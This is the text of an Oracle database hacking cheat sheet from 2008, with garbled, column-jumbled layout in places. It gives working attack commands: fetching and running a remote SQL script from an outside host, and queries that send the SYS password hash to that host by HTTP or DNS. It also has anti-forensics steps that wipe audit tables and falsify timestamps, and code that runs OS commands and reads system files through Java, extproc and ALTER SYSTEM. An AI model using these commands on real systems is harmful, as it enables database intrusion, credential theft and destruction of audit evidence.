Professional Documents
Culture Documents
Oracle Security Cheat Sheet PDF
Oracle Security Cheat Sheet PDF
0 - 29-Jan-2008
Simple file
TNS-Listener without ONS installed OPS$ account sharing XMLDB installed and active
Modify
Password / Login.sql / (create a user with (connect to a DB
(onsctl start the name of OPS$ (init.ora:
ADMIN_RESTRICTION Glogin.sql
running on Windows
dispatchers='(PROTOCOL=TCP)
Port 6200, <=10.1.0.4) and login without pw) XP with Simple File
(SERVICE=<ORACLE_SID>XDB)')
Sharing)
Port 2100(FTP), Port 8080 (HTTP)
9.2.0.6 Buffer
No R*services Insert code like 9.2.0.1 Buffer Overflow
R*services installed Amap against port
grant dba to public via long FTP or HTTP
Overflow via long
installed 6200 crashes the ONS FTP username
or Net user oracle Sqlplus /@ip/sid as Password
( create file .rhosts service
( create file glogin.sql @http:// rdspw /add sysdba
unix/mac: tnscmd10g.pl (unpublished, no
unix/mac: tnscmd10g.pl www.orasploit.com/ (published, e.g.via
windows: tnslogfile.exe ) published exploit
windows: tnslogfile.exe ) becomedba.sql Metasploit-exploit)
avaiable)
Hacking Oracle – www.red-database-security.com - Version 1.5.0 - 29-Jan-2008
OCI-Connection
XMLDB
(TNS Listener available
(default 1521))
SID unknown
SID known
(7.x-10.2.0.2 with
10i R1 SQL Injection Update selectable Update selectable 10g – 11g
CPU Jan 2006) Change public 10g – 11g
Use SQL injection in DBMS_EXPORT_EX tables via specially tables via specially use utl_tcp to modify Privilege escalation in
Patch oraclient10.dll synonym dbms_scheduler &
Oracle packages, TENSION crafted inline views crafted views TNS-Listener settings vulnerable 3rd-party /
and login or dbms_assert and run sqlplus „/ as
e.g. (fixed with CPU July (fixed with CPU (fixed for 10g R2 with (change glogin.sql via customer code
ora-auth-alter- inject sql code sysdba“
KUPM$MCP 2006) October 2006) CPU Juli 2007) listener.log)
session.exe
SQL*Plus-Commands:
@http://www.orasploit.com/becomedba.sql -- execute a SQL Script from a HTTP server (FTP is also possible)
host cmd.exe /c 0wned > c:\rds8.txt -- run OS commands from sqlplus (on the client), Instead of host the shortcuts ! (unix) or $ (Windows) are also possible
spool c:\myspool.txt -- create a logfile of the SQL*Plus Session called myspool.txt (disable: spool off)
Web Access:
Web access via utl_http: select utl_http.request('http://www.orasploit.com/utl_http’) from dual; -- all users,, 8-10g R2
Web access via httpuritype: select httpuritype( 'http://www.orasploit.com/httpuritype' ).getclob() from dual; -- all users,, 8-10g R2
Send password hash to webserver: select utl_http.request('http://www.orasploit.com/’||(select username||’=’||password from dba_users -- only DBA, change value of username for other users
where username=’SYS’)) from dual;
Send password hash to webserver: select httpuritype('http://www.orasploit.com/’||(select username||’=’||password from dba_users -- only DBA, change value of username for other users
where username=’SYS’)).getclob() from dual;
Send password hash via DNS: select utl_http.request('http://www.’||(select username||’=’||password from dba_users -- only DBA, change value of username for other users
where username=’SYS’)||’.orasploit.com/’ ) from dual;
Anti-Forensics:
Clear v$sql: alter system flush shared pool; -- only DBA, all versions
Clear sys.wrh_sqlstat: truncate table sys.wrh$_sqlstat; -- only DBA, 10g/11g
Clear audit-Table: truncate table sys.aud$; -- only as SYS, all versions
Clear audit-Table: delete table sys.aud$; -- only, all versions
Change object creation date: update sys.obj$ set ctime=sysdate-300, mtime=sysdate-300, stime=sysdate-300 where name='AUD$'; -- change the creation date of an object
Hacking Oracle – www.red-database-security.com - Version 1.5.0 - 29-Jan-2008
Write Text Files via dbms_advisor: (10g/11g, requires the privilege advisor) Create or replace procedure javacmdproc (p_command in varchar2)
Create or replace directory EXT as 'C:\’; as language java
grant advisor to user1; name 'JAVACMD.execCommand (java.lang.String)';
exec dbms_advisor.create_file ( 'hacked', EXT, 'rds2.txt' ) /
Read Files via Java: exec javacmdproc('cmd.exe /c echo 0wned > c:\rds4.txt');
grant javasyspriv to user1;
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" AS Run OS Commands via ALTER SYSTEM & PL/SQL native: (9i)
import java.lang.*; alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds5.txt &';
import java.io.*; alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end;
public class JAVAREADFILE{ /
public static void readfile(String filename) throws IOException{
FileReader f = new FileReader(filename); Run OS Commands via Extproc
BufferedReader fr = new BufferedReader(f); -- Since 9i extproc can only run DLLs from the Oracle_Home-Bin directory
String text = fr.readLine();; -- copy the msvcrt.dll to this directory before executing this code
while(text != null){ Grant create any library to user1;
System.out.println(text); Create or replace library exec_shell AS 'C:\oracle\ora102\bin\msvcrt.dll';
text = fr.readLine(); } Create or replace package oracmd is procedure exec(cmdstring IN CHAR); end oracmd; /
fr.close(); } Create or replace package body oracmd IS
}; procedure exec(cmdstring IN CHAR)
is external NAME "system"
CREATE OR REPLACE PROCEDURE JAVAREADFILEPROC (p_filename IN library exec_shell LANGUAGE C;
VARCHAR2) end oracmd;
AS LANGUAGE JAVA /
NAME 'JAVAREADFILE.readfile (java.lang.String)'; exec oracmd.exec('cmd.exe /c echo 0wned > c:\rds7.txt');
/
set serveroutput on size 100000
exec dbms_java.set_output(2000);
exec JAVAREADFILEPROC('C:\boot.ini')